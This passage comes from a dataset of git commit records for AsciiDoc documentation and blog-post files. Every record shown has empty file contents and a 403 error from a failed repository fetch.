vyShi\/elasticsearch,Brijeshrpatel9\/elasticsearch,jango2015\/elasticsearch,yynil\/elasticsearch,Uiho\/elasticsearch,ouyangkongtong\/elasticsearch,hafkensite\/elasticsearch,cnfire\/elasticsearch-1,KimTaehee\/elasticsearch,glefloch\/elasticsearch,markwalkom\/elasticsearch,MisterAndersen\/elasticsearch,artnowo\/elasticsearch,pranavraman\/elasticsearch,GlenRSmith\/elasticsearch,StefanGor\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,wbowling\/elasticsearch,pranavraman\/elasticsearch,socialrank\/elasticsearch,adrianbk\/elasticsearch,awislowski\/elasticsearch,beiske\/elasticsearch,Brijeshrpatel9\/elasticsearch,MisterAndersen\/elasticsearch,nknize\/elasticsearch,elancom\/elasticsearch,sposam\/elasticsearch,dongjoon-hyun\/elasticsearch,KimTaehee\/elasticsearch,masterweb121\/elasticsearch,knight1128\/elasticsearch,polyfractal\/elasticsearch,njlawton\/elasticsearch,MichaelLiZhou\/elasticsearch,rlugojr\/elasticsearch,avikurapati\/elasticsearch,MjAbuz\/elasticsearch,fforbeck\/elasticsearch,YosuaMichael\/elasticsearch,lightslife\/elasticsearch,himanshuag\/elasticsearch,Helen-Zhao\/elasticsearch,sc0ttkclark\/elasticsearch,knight1128\/elasticsearch,petabytedata\/elasticsearch,ricardocerq\/elasticsearch,likaiwalkman\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,queirozfcom\/elasticsearch,pranavraman\/elasticsearch,iantruslove\/elasticsearch,s1monw\/elasticsearch,fernandozhu\/elasticsearch,episerver\/elasticsearch,amit-shar\/elasticsearch,spiegela\/elasticsearch,mikemccand\/elasticsearch,ESamir\/elasticsearch,elasticdog\/elasticsearch,kingaj\/elasticsearch,adrianbk\/elasticsearch,LeoYao\/elasticsearch,lydonchandra\/elasticsearch,hafkensite\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,knight1128\/elasticsearch,wittyameta\/elasticsearch,martinstuga\/elasticsearch,geidies\/elasticsearch,jchampion\/elasticsearch,zhiqinghuang\/elasticsearch,lks21c\/elasticsearch,ulkas\/elasticsearch,nazarewk\/elasticsearch,hafkensite\/elasticsearch,snikch\/elasticsearch,ulkas\/elasticsearch,mjason3\/elasticsearch,ulkas\/elasticsearch,yuy168\/elasticsearch,jango2015\/elasticsearch,mjhennig\/elasticsearch,fekaputra\/elasticsearch,i-am-Nathan\/elasticsearch,lzo\/elasticsearch-1,wuranbo\/elasticsearch,rmuir\/elasticsearch,mm0\/elasticsearch,socialrank\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,pablocastro\/elasticsearch,geidies\/elasticsearch,kunallimaye\/elasticsearch,palecur\/elasticsearch,amit-shar\/elasticsearch,wuranbo\/elasticsearch,nrkkalyan\/elasticsearch,MichaelLiZhou\/elasticsearch,fred84\/elasticsearch,Rygbee\/elasticsearch,dongjoon-hyun\/elasticsearch,MichaelLiZhou\/elasticsearch,C-Bish\/elasticsearch,LewayneNaidoo\/elasticsearch,trangvh\/elasticsearch,Helen-Zhao\/elasticsearch,GlenRSmith\/elasticsearch,elasticdog\/elasticsearch,kaneshin\/elasticsearch,hafkensite\/elasticsearch,areek\/elasticsearch,nezirus\/elasticsearch,dpursehouse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,linglaiyao1314\/elasticsearch,dylan8902\/elasticsearch,schonfeld\/elasticsearch,fekaputra\/elasticsearch,brandonkearby\/elasticsearch,sreeramjayan\/elasticsearch,AndreKR\/elasticsearch,alexshadow007\/elasticsearch,truemped\/elasticsearch,hirdesh2008\/elasticsearch,springning\/elasticsearch,yongminxia\/elasticsearch,Uiho\/elasticsearch,xingguang2013\/elasticsearch,infusionsoft\/elasticsearch,KimTaehee\/elasticsearch,acchen97\/elasticsearch,springning\/elasticsearch,kaneshin\/elasticsearch,martinstuga\/elasticsearch,xingguang2013\/elasticsearch,drewr\/elasticsearch,m
nylen\/elasticsearch,yynil\/elasticsearch,mgalushka\/elasticsearch,lmtwga\/elasticsearch,episerver\/elasticsearch,jchampion\/elasticsearch,rento19962\/elasticsearch,yuy168\/elasticsearch,petabytedata\/elasticsearch,rento19962\/elasticsearch,strapdata\/elassandra5-rc,nellicus\/elasticsearch,ZTE-PaaS\/elasticsearch,18098924759\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jango2015\/elasticsearch,mjhennig\/elasticsearch,rhoml\/elasticsearch,episerver\/elasticsearch,kingaj\/elasticsearch,Ansh90\/elasticsearch,pranavraman\/elasticsearch,cnfire\/elasticsearch-1,Collaborne\/elasticsearch,MjAbuz\/elasticsearch,yuy168\/elasticsearch,sdauletau\/elasticsearch,vroyer\/elasticassandra,kalburgimanjunath\/elasticsearch,xuzha\/elasticsearch,elasticdog\/elasticsearch,mcku\/elasticsearch,apepper\/elasticsearch,ckclark\/elasticsearch,s1monw\/elasticsearch,pritishppai\/elasticsearch,trangvh\/elasticsearch,snikch\/elasticsearch,lightslife\/elasticsearch,diendt\/elasticsearch,pozhidaevak\/elasticsearch,ouyangkongtong\/elasticsearch,xingguang2013\/elasticsearch,gfyoung\/elasticsearch,mm0\/elasticsearch,clintongormley\/elasticsearch,jpountz\/elasticsearch,karthikjaps\/elasticsearch,Charlesdong\/elasticsearch,lmtwga\/elasticsearch,wangtuo\/elasticsearch,myelin\/elasticsearch,schonfeld\/elasticsearch,schonfeld\/elasticsearch,yynil\/elasticsearch,onegambler\/elasticsearch,iantruslove\/elasticsearch,sposam\/elasticsearch,vietlq\/elasticsearch,likaiwalkman\/elasticsearch,TonyChai24\/ESSource","old_file":"docs\/reference\/query-dsl\/geo-polygon-query.asciidoc","new_file":"docs\/reference\/query-dsl\/geo-polygon-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"085688150a165a02128207fb880988c744e1038b","subject":"Formatting","message":"Formatting\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Search path\/Exercices.adoc","new_file":"Search path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bf5752be33c06a2c022bd474027b4cd4c0d71be","subject":"Update 2016-04-05-Eintrag-3.adoc","message":"Update 2016-04-05-Eintrag-3.adoc","repos":"soyabeen\/soyabeen.github.io,soyabeen\/soyabeen.github.io,soyabeen\/soyabeen.github.io,soyabeen\/soyabeen.github.io","old_file":"_posts\/2016-04-05-Eintrag-3.adoc","new_file":"_posts\/2016-04-05-Eintrag-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soyabeen\/soyabeen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eed22138060bf93fb6d9ea1ea4e2dbefdec4f835","subject":"Update 2015-12-30-Demo-for-mojs-Library.adoc","message":"Update 2015-12-30-Demo-for-mojs-Library.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2015-12-30-Demo-for-mojs-Library.adoc","new_file":"_posts\/2015-12-30-Demo-for-mojs-Library.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c30c74b8dca157bc41a497c50028ff9ff75e3801","subject":"Update 2016-04-15-Introduccion-a-Ruby.adoc","message":"Update 2016-04-15-Introduccion-a-Ruby.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f18c53386895da2bdb6c01589b7f3a954c4cc7bf","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fee434bc7aa72f2896b24c3b5e1441b5294ad3f","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f9ba807b16c2ad37c82ef702c265c9b8f6c7f6c","subject":"CNV16208d Adding dummy file for 4.11 release notes","message":"CNV16208d Adding dummy file for 4.11 release notes\n\nCNV16208d Dummy file for 4.11 RN\n\nCNV16208d Dummy file for 4.11 RN 2\n\nReverting file to previous state\n\nCNV16208d Dummy file for 4.11 RN 3\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"virt\/virt-4-11-release-notes.adoc","new_file":"virt\/virt-4-11-release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5dec9067d9444cb9fdd00eca2984d6fa78006ed2","subject":"Update 2016-06-18-Non-secure-icons.adoc","message":"Update 2016-06-18-Non-secure-icons.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"66093f1f51bec2f048ce1ea994a844f0c5dce865","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ac3509a99fdc0cefb324643a5ed55286c502a7a","subject":"ssh-agent and ssh-add at login","message":"ssh-agent and ssh-add at login\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1fe85537fc24bdbc5b3473760595d2eb8f2fbbc6","subject":"Update 2014-09-16-URI-bug-fixed.adoc","message":"Update 2014-09-16-URI-bug-fixed.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-16-URI-bug-fixed.adoc","new_file":"_posts\/2014-09-16-URI-bug-fixed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f14ab4d40904f45f6938eb34e8a7d9673ef7970","subject":"Update 2017-05-27-first-article.adoc","message":"Update 2017-05-27-first-article.adoc","repos":"cszongyang\/myzone,cszongyang\/myzone","old_file":"_posts\/2017-05-27-first-article.adoc","new_file":"_posts\/2017-05-27-first-article.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cszongyang\/myzone.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f352d7e3ca457fe75a28ca377bb5a6cda77e4cca","subject":"Update 2018-12-20-jira-howtouse.adoc","message":"Update 2018-12-20-jira-howtouse.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-20-jira-howtouse.adoc","new_file":"_posts\/2018-12-20-jira-howtouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1d352a05c373ca8cd51e1fb7385fc34d0ded7b3","subject":"Fixed output from oc get cj in updating Logging page","message":"Fixed output from oc get cj in updating Logging page\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cluster-logging-updating-logging.adoc","new_file":"modules\/cluster-logging-updating-logging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e86f0f89088220edb3f7fc828cbcd5ba1dc9615","subject":"Update instructions 
in the the README for building reference docs","message":"Update instructions in the the README for building reference docs\n\nThe instructions should have been updated as part of the work on\ngh-5267 so that the zip of all of the starter poms is available to\nthe documentation's build. With that fixed, the current instructions\nstill fail as the javadoc fails to generated as a result of\norg.springframework.boot:spring-boot:test-jar:tests being unavailable.\nThis can be avoid by simply not trying to build the javadoc, i.e.\nby running generate-resources rather than install.\n\nCloses gh-5633\n","repos":"ihoneymon\/spring-boot,thomasdarimont\/spring-boot,lucassaldanha\/spring-boot,vakninr\/spring-boot,philwebb\/spring-boot-concourse,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tsachev\/spring-boot,ptahchiev\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,dreis2211\/spring-boot,bijukunjummen\/spring-boot,mbenson\/spring-boot,jbovet\/spring-boot,mbogoevici\/spring-boot,brettwooldridge\/spring-boot,felipeg48\/spring-boot,Buzzardo\/spring-boot,scottfrederick\/spring-boot,mbenson\/spring-boot,linead\/spring-boot,minmay\/spring-boot,bclozel\/spring-boot,philwebb\/spring-boot,jvz\/spring-boot,kdvolder\/spring-boot,ilayaperumalg\/spring-boot,jvz\/spring-boot,RichardCSantana\/spring-boot,NetoDevel\/spring-boot,hqrt\/jenkins2-course-spring-boot,shakuzen\/spring-boot,tiarebalbi\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot,javyzheng\/spring-boot,zhanhb\/spring-boot,tsachev\/spring-boot,chrylis\/spring-boot,lburgazzoli\/spring-boot,ollie314\/spring-boot,vpavic\/spring-boot,akmaharshi\/jenkins,spring-projects\/spring-boot,tsachev\/spring-boot,drumonii\/spring-boot,ihoneymon\/spring-boot,jayarampradhan\/spring-boot,akmaharshi\/jenkins,dreis2211\/spring-boot,SaravananParthasarathy\/SPSDemo,nebhale\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,royclarkson\/spring-boot,mosoft521\/spring-boot,olivergierke\/spring-boot,izeye\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,isopov\/spring-boot,tsachev\/spring-boot,ptahchiev\/spring-boot,mosoft521\/spring-boot,philwebb\/spring-boot-concourse,yhj630520\/spring-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,mbogoevici\/spring-boot,herau\/spring-boot,tiarebalbi\/spring-boot,zhanhb\/spring-boot,i007422\/jenkins2-course-spring-boot,linead\/spring-boot,deki\/spring-boot,habuma\/spring-boot,RichardCSantana\/spring-boot,javyzheng\/spring-boot,htynkn\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,akmaharshi\/jenkins,ptahchiev\/spring-boot,bjornlindstrom\/spring-boot,bijukunjummen\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,sebastiankirsch\/spring-boot,sebastiankirsch\/spring-boot,yangdd1205\/spring-boot,habuma\/spring-boot,joshiste\/spring-boot,jmnarloch\/spring-boot,wilkinsona\/spring-boot,brettwooldridge\/spring-boot,michael-simons\/spring-boot,i007422\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,Nowheresly\/spring-boot,habuma\/spring-boot,tiarebalbi\/spring-boot,vpavic\/spring-boot,herau\/spring-boot,hello2009chen\/spring-boot,hqrt\/jenkins2-course-spring-boot,felipeg48\/spring-boot,isopov\/spring-boot,xiaoleiPENG\/my-project,donhuvy\/spring-boot,lucassaldanha\/spring-boot,philwebb\/spring-boot,sbcoba\/spring-boot,herau\/spring-boot,deki\/spring-boot,dreis2211\/spring-boot,yangdd1205\/spring-boot,hqrt\/jenkins2-course-spring-boot,ollie314\/spring-boot,cleverjava\/jenkins2
-course-spring-boot,kamilszymanski\/spring-boot,Buzzardo\/spring-boot,zhanhb\/spring-boot,isopov\/spring-boot,jmnarloch\/spring-boot,thomasdarimont\/spring-boot,mdeinum\/spring-boot,RichardCSantana\/spring-boot,bclozel\/spring-boot,ilayaperumalg\/spring-boot,joshiste\/spring-boot,thomasdarimont\/spring-boot,bjornlindstrom\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,rweisleder\/spring-boot,RichardCSantana\/spring-boot,ptahchiev\/spring-boot,donhuvy\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,isopov\/spring-boot,spring-projects\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,philwebb\/spring-boot-concourse,wilkinsona\/spring-boot,minmay\/spring-boot,htynkn\/spring-boot,philwebb\/spring-boot-concourse,donhuvy\/spring-boot,donhuvy\/spring-boot,izeye\/spring-boot,jxblum\/spring-boot,cleverjava\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,ollie314\/spring-boot,bclozel\/spring-boot,bijukunjummen\/spring-boot,drumonii\/spring-boot,spring-projects\/spring-boot,bjornlindstrom\/spring-boot,minmay\/spring-boot,kamilszymanski\/spring-boot,pvorb\/spring-boot,candrews\/spring-boot,qerub\/spring-boot,jayarampradhan\/spring-boot,i007422\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,hello2009chen\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,nebhale\/spring-boot,sbcoba\/spring-boot,drumonii\/spring-boot,DeezCashews\/spring-boot,ollie314\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,akmaharshi\/jenkins,NetoDevel\/spring-boot,felipeg48\/spring-boot,qerub\/spring-boot,minmay\/spring-boot,Nowheresly\/spring-boot,kamilszymanski\/spring-boot,kdvolder\/spring-boot,donhuvy\/spring-boot,chrylis\/spring-boot,Nowheresly\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,NetoDevel\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,javyzheng\/spring-boot,brettwooldridge\/spring-boot,habuma\/spring-boot,jmnarloch\/spring-boot,nebhale\/spring-boot,royclarkson\/spring-boot,philwebb\/spring-boot-concourse,mevasaroj\/jenkins2-course-spring-boot,linead\/spring-boot,vpavic\/spring-boot,yhj630520\/spring-boot,philwebb\/spring-boot,rweisleder\/spring-boot,xiaoleiPENG\/my-project,bjornlindstrom\/spring-boot,joshthornhill\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,yhj630520\/spring-boot,ollie314\/spring-boot,jbovet\/spring-boot,minmay\/spring-boot,nebhale\/spring-boot,rweisleder\/spring-boot,lburgazzoli\/spring-boot,DeezCashews\/spring-boot,shangyi0102\/spring-boot,shangyi0102\/spring-boot,philwebb\/spring-boot,lexandro\/spring-boot,hello2009chen\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,royclarkson\/spring-boot,jbovet\/spring-boot,michael-simons\/spring-boot,herau\/spring-boot,xiaoleiPENG\/my-project,kamilszymanski\/spring-boot,mosoft521\/spring-boot,olivergierke\/spring-boot,javyzheng\/spring-boot,zhanhb\/spring-boot,SaravananParthasarathy\/SPSDemo,jxblum\/spring-boot,shangyi0102\/spring-boot,candrews\/spring-boot,jayarampradhan\/spring-boot,zhanhb\/spring-boot,afroje-reshma\/spring-boot-sample,yhj630520\/spring-boot,eddumelendez\/spring-boot,vakninr\/spring-boot,candrews\/spring-boot,mosoft521\/spring-boot,afroje-reshma\/spring-boot-sample,NetoDevel\/spring-boot,joshthornhill\/spring-boot,izeye\/spring-boot,bbrouwer\/spring-boot,bbrouwer\/spring-boot,isopov\/spring-boot,jxblum\/spring-boot,shakuzen\/spring-boot,thomasdarimont\/spring-boot,iz
eye\/spring-boot,mbogoevici\/spring-boot,tiarebalbi\/spring-boot,jbovet\/spring-boot,rweisleder\/spring-boot,jmnarloch\/spring-boot,DeezCashews\/spring-boot,jxblum\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,thomasdarimont\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,eddumelendez\/spring-boot,lexandro\/spring-boot,bbrouwer\/spring-boot,lexandro\/spring-boot,chrylis\/spring-boot,olivergierke\/spring-boot,mdeinum\/spring-boot,SaravananParthasarathy\/SPSDemo,zhanhb\/spring-boot,sebastiankirsch\/spring-boot,cleverjava\/jenkins2-course-spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,chrylis\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,ptahchiev\/spring-boot,pvorb\/spring-boot,lucassaldanha\/spring-boot,kdvolder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,nebhale\/spring-boot,joshthornhill\/spring-boot,i007422\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,DeezCashews\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mosoft521\/spring-boot,kdvolder\/spring-boot,lexandro\/spring-boot,jayarampradhan\/spring-boot,yangdd1205\/spring-boot,lburgazzoli\/spring-boot,michael-simons\/spring-boot,pvorb\/spring-boot,shakuzen\/spring-boot,ilayaperumalg\/spring-boot,olivergierke\/spring-boot,jbovet\/spring-boot,mdeinum\/spring-boot,ilayaperumalg\/spring-boot,ptahchiev\/spring-boot,ihoneymon\/spring-boot,joshiste\/spring-boot,jvz\/spring-boot,qerub\/spring-boot,izeye\/spring-boot,deki\/spring-boot,royclarkson\/spring-boot,mdeinum\/spring-boot,felipeg48\/spring-boot,felipeg48\/spring-boot,dreis2211\/spring-boot,jvz\/spring-boot,joshiste\/spring-boot,joshiste\/spring-boot,hqrt\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,joshiste\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,habuma\/spring-boot,ihoneymon\/spring-boot,bjornlindstrom\/spring-boot,mbogoevici\/spring-boot,ilayaperumalg\/spring-boot,xiaoleiPENG\/my-project,qerub\/spring-boot,hqrt\/jenkins2-course-spring-boot,vpavic\/spring-boot,spring-projects\/spring-boot,linead\/spring-boot,akmaharshi\/jenkins,vakninr\/spring-boot,lucassaldanha\/spring-boot,bijukunjummen\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,vakninr\/spring-boot,spring-projects\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,shangyi0102\/spring-boot,tiarebalbi\/spring-boot,candrews\/spring-boot,michael-simons\/spring-boot,javyzheng\/spring-boot,afroje-reshma\/spring-boot-sample,vpavic\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,SaravananParthasarathy\/SPSDemo,qerub\/spring-boot,bclozel\/spring-boot,bbrouwer\/spring-boot,chrylis\/spring-boot,drumonii\/spring-boot,afroje-reshma\/spring-boot-sample,donhuvy\/spring-boot,herau\/spring-boot,isopov\/spring-boot,michael-simons\/spring-boot,pvorb\/spring-boot,mbenson\/spring-boot,eddumelendez\/spring-boot,brettwooldridge\/spring-boot,sbcoba\/spring-boot,i007422\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,xiaoleiPENG\/my-project,habuma\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,tsachev\/spring-boot,aahlenst\/spring-boot,sebastiankirsch\/spring-boot,lucassaldanha\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,spring-projects\/spring-boot,sebastiankirsch\/spring-boot,kdvolder\/spring-boot,pvorb\/spring-boot,drumonii\/spring-boot,shakuzen\/spring-boot,NetoDevel\/spring-boot,royclarkson\/spring-boot,linead\/spring-boot,sbcoba\/spring
-boot,lburgazzoli\/spring-boot,bbrouwer\/spring-boot,felipeg48\/spring-boot,mbogoevici\/spring-boot,rweisleder\/spring-boot,shangyi0102\/spring-boot,candrews\/spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,eddumelendez\/spring-boot,scottfrederick\/spring-boot,Nowheresly\/spring-boot,hello2009chen\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,olivergierke\/spring-boot,DeezCashews\/spring-boot,scottfrederick\/spring-boot","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"608689383eb56902d0a0fa0caffd201f65061bce","subject":"Update 2015-09-23-.adoc","message":"Update 2015-09-23-.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-23-.adoc","new_file":"_posts\/2015-09-23-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7fcace39ad222da77f04e759ab0c93bc0dbd6dc","subject":"Update 2015-10-21-.adoc","message":"Update 2015-10-21-.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-21-.adoc","new_file":"_posts\/2015-10-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccebd0acb54c0ca6d72e9d1d34f4895ec76bd225","subject":"Remove `include` directive","message":"Remove `include` directive\n","repos":"spodin\/algorithms","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spodin\/algorithms.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"800cb7d7965e7277d5a1534ffd97c7066a3ce78a","subject":"Updated documentation","message":"Updated documentation","repos":"mehtabsinghmann\/resilience4j,RobWin\/javaslang-circuitbreaker,goldobin\/resilience4j,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,resilience4j\/resilience4j,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cba6ee72d5cd44d05789d38527d23fa05546f4c0","subject":"added readme","message":"added readme\n","repos":"m-m-m\/game,ghosthopper\/ghosthopper","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/game.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c65754d3614862a7a07ebba67e3faa13ba883691","subject":"Now hosted on GitLab","message":"Now hosted on 